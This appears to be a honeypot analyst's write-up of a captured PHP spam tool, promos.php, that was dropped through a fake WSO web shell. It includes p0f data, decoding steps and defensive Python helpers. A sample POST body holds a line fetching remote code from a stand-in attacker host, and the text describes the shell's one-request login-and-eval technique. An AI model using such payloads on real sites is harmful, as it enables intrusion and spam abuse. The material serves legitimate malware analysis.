
promos.php

Email spamming tool.

Origin

Internet Protocol Address

188.40.81.84 => static.84.81.40.188.clients.your-server.de

An IP address from AS24940, Hetzner Online, Datacenter 10

traceroute shows a route going into hetzner.interxionfra4.nl-ix.net and then core21.fsn1.hetzner.com, so the whois and DNS lookup seem believable.

p0f3 data:

[2017/12/08 06:00:07] mod=syn|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=12|params=none|raw_sig=4:116+12:0:1306:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0
[2017/12/08 06:00:07] mod=mtu|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=cli|link=???|raw_mtu=1346
[2017/12/08 06:00:07] mod=syn+ack|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=srv|os=???|dist=0|params=none|raw_sig=4:64+0:0:1460:mss*20,7:mss,nop,nop,sok,nop,ws:df:0
[2017/12/08 06:00:07] mod=mtu|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=srv|link=Ethernet or modem|raw_mtu=1500

A Windows 7 or 8 machine. Interesting.

Download

Download to a fake WSO web shell that is part of my WordPress honey pot.

Took advantage of WSO features by having the login password in a POST name/value pair, "[pass] => nhzgrf", along with the "Php" action and the PHP source code to evaluate. WSO accepts all three in the same request, so the downloader logs in and gets remote code execution in a single POST.
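The honeypot-side view of that single request, as an added example (not code from this repository or from WSO): a small classifier that parses a urlencoded POST body and flags the login-plus-eval combination. The "pass" field and the "Php" action come from the capture above; the field names "a" (action) and "p1" (code handed to eval) are an assumption based on common WSO variants, and the sample bodies are constructed.

```python
from urllib.parse import parse_qs, quote
import re

# Field names. "pass" and the "Php" action are what the capture on this page shows;
# "a" and "p1" are an assumption drawn from common WSO variants.
LOGIN_FIELD = "pass"
ACTION_FIELD = "a"
CODE_FIELD = "p1"
RCE_ACTION = "Php"

URL_RE = re.compile(r"https?://[^\s'\"]+")


def classify_wso_post(body: str) -> dict:
    """Describe what one urlencoded POST body is trying to do to a WSO-style shell."""
    # Last value wins if a field is repeated, mirroring PHP's $_POST behaviour.
    fields = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    login = LOGIN_FIELD in fields
    action = fields.get(ACTION_FIELD, "")
    code = fields.get(CODE_FIELD, "") if action == RCE_ACTION else ""
    rce = bool(code.strip())
    return {
        "login_attempt": login,
        "password": fields.get(LOGIN_FIELD),
        "action": action,
        "rce": rce,
        # Login and eval in the same request: the one-shot pattern described above.
        "one_shot": login and rce,
        "code": code,
        # URLs embedded in the evaluated code are usually the download source.
        "urls": URL_RE.findall(code),
    }


def triage(bodies):
    """Return one summary per body, most interesting (one-shot RCE) first."""
    results = [classify_wso_post(b) for b in bodies]
    return sorted(results, key=lambda r: (r["one_shot"], r["rce"], r["login_attempt"]), reverse=True)


# Constructed sample bodies, not the honeypot's real capture. The password is the
# one quoted on this page; the download URL is a placeholder.
SAMPLE_BODIES = [
    "pass=nhzgrf",
    "pass=nhzgrf&a=FilesMan",
    "pass=nhzgrf&a=Php&p1="
    + quote("file_put_contents('dc1.php', file_get_contents('http://attacker.example/dc1.txt'));"),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_BODIES):
        print(r["one_shot"], r["action"], r["urls"])
```

Run against a honeypot's request log, the "one_shot" flag separates a downloader like this one from an operator merely browsing the shell's file manager.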

Decoding

  1. cp 188.40.81.84WiqM2DM84DBGMCs7q5JorQAAAAU.php.file dc1.php
  2. Hand edit dc1.php to remove goop, and verify it doesn't do bad things.
  3. php dc1.php, which yields promos.php
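An alternative to step 3 that never executes the dropper, as an added example (not part of this repository): peel the eval() wrapper layers statically in Python instead of running them through php. The page does not show what goop dc1.php actually carried, so the supported decoders (base64_decode, gzinflate, gzuncompress, strrev, str_rot13) and the two-layer sample built by make_sample() are assumptions standing in for it.

```python
import base64
import codecs
import re
import zlib

# PHP decoder functions commonly chained inside eval(). gzinflate() takes raw
# DEFLATE (what gzdeflate() emits), gzuncompress() takes zlib-wrapped data.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "strrev": lambda b: b[::-1],
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}

# eval( fn1( fn2( '<literal>' ) ) ) with any number of nested decoder calls.
LAYER_RE = re.compile(
    r"eval\s*\(\s*(?P<chain>(?:[A-Za-z_]\w*\s*\(\s*)+)(?P<q>['\"])(?P<lit>[^'\"]*)(?P=q)\s*\)+",
    re.S,
)


def peel_layer(src: str):
    """Decode one eval(...) wrapper statically; return None if src has none."""
    m = LAYER_RE.search(src)
    if not m:
        return None
    funcs = re.findall(r"[A-Za-z_]\w*", m.group("chain"))
    payload = m.group("lit").encode("latin-1")
    # PHP applies the innermost call first, so walk the chain in reverse.
    for name in reversed(funcs):
        if name not in DECODERS:
            raise ValueError(f"unsupported decoder in wrapper: {name}")
        payload = DECODERS[name](payload)
    return payload.decode("latin-1")


def unwrap(src: str, max_layers: int = 20):
    """Peel wrappers until plain code remains. Returns (code, layers_removed)."""
    layers = 0
    while layers < max_layers:
        nxt = peel_layer(src)
        if nxt is None:
            break
        src, layers = nxt, layers + 1
    return src, layers


def make_sample(plain: str) -> str:
    """Constructed two-layer dropper in the style the Decoding steps describe."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE, like gzdeflate()
    raw = co.compress(plain.encode("latin-1")) + co.flush()
    inner = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()
    return "<?php eval(base64_decode('%s'));" % base64.b64encode(inner.encode()).decode()


# Constructed innermost payload, modelled on the echo described below.
PLAIN = "echo 'p_url_to_check: http://compromised.host/directory/promos.php';"

if __name__ == "__main__":
    code, n = unwrap(make_sample(PLAIN))
    print(n, "layers removed")
    print(code)
```

Because nothing is evaluated, a dropper that also deletes files, phones home, or checks its own filename behaves the same as a benign one here; the hand inspection in step 2 is still needed once the plain code is out.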

It looks like the code in dc1.php will echo something like:

p_url_to_check: http://compromised.host/directory/promos.php

This may be a way to communicate what URL to use to reach promos.php's fabulous functionality once it is installed.

Usage

Invoked via HTTP POST.

Two main functions, "Check" (?ch=1) and "Send" (?sn=1).

The "Send" function looks like it can explode a single email to many unwilling recipients. It appears to support attachments, and may append randomized blobs of characters to try to fool spam filters. It ultimately uses PHP's built-in mail() function.

The "Check" function can send test emails. It can also check whether the IP address of the compromised WordPress site appears in these DNS-based email spam blacklists:

b.barracudacentral.org
xbl.spamhaus.org
sbl.spamhaus.org
zen.spamhaus.org
bl.spamcop.net
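What that "Check" lookup amounts to, as an added example (not the tool's own code): reverse the octets of the address, prepend them to each zone name and do an A lookup; NXDOMAIN means not listed, an answer in 127.0.0.0/24 means listed. The Spamhaus return-code table and the 127.255.255.x error codes are taken from Spamhaus's documentation; the resolver is injectable so the lookups can be replayed offline with a constructed answer table.

```python
import ipaddress
import socket

# The five zones promos.php queries.
DNSBL_ZONES = [
    "b.barracudacentral.org",
    "xbl.spamhaus.org",
    "sbl.spamhaus.org",
    "zen.spamhaus.org",
    "bl.spamcop.net",
]

# Spamhaus return codes (zen/sbl/xbl). Other zones just answer 127.0.0.2.
SPAMHAUS_CODES = {
    "127.0.0.2": "SBL", "127.0.0.3": "SBL CSS",
    "127.0.0.4": "XBL", "127.0.0.5": "XBL", "127.0.0.6": "XBL", "127.0.0.7": "XBL",
    "127.0.0.9": "SBL DROP", "127.0.0.10": "PBL", "127.0.0.11": "PBL",
}
LISTED_NET = ipaddress.IPv4Network("127.0.0.0/24")
ERROR_NET = ipaddress.IPv4Network("127.255.255.0/24")   # Spamhaus: bad query, open resolver, rate limit


def dnsbl_name(ip: str, zone: str) -> str:
    """84.81.40.188.zen.spamhaus.org for 188.40.81.84: octets reversed, zone appended."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def resolve_a(name: str):
    """Live A lookup via the system resolver; None on NXDOMAIN / no answer."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def interpret(zone: str, answer) -> str:
    if answer is None:
        return "not listed"
    addr = ipaddress.IPv4Address(answer)
    if addr in LISTED_NET:
        if zone.endswith("spamhaus.org"):
            return "listed (%s)" % SPAMHAUS_CODES.get(answer, answer)
        return "listed (%s)" % answer
    if addr in ERROR_NET:
        return "query error (%s)" % answer
    return "unexpected answer (%s)" % answer


def check_dnsbls(ip: str, zones=DNSBL_ZONES, resolve=resolve_a) -> dict:
    """Map each zone to a human-readable listing status for ip."""
    return {zone: interpret(zone, resolve(dnsbl_name(ip, zone))) for zone in zones}


if __name__ == "__main__":
    # 127.0.0.2 is the conventional always-listed test address for DNSBLs.
    for zone, status in check_dnsbls("127.0.0.2").items():
        print(f"{zone:28} {status}")
```

Two caveats for anyone running the live version: Spamhaus answers queries that arrive through large public resolvers with a 127.255.255.x code rather than a listing, so a site whose PHP resolver forwards to one will see "query error" (or nothing, if the code is ignored) and wrongly conclude it is clean; and the address that matters is the one the outbound mail leaves from, which on a NATed or shared host is not necessarily the address PHP sees for itself.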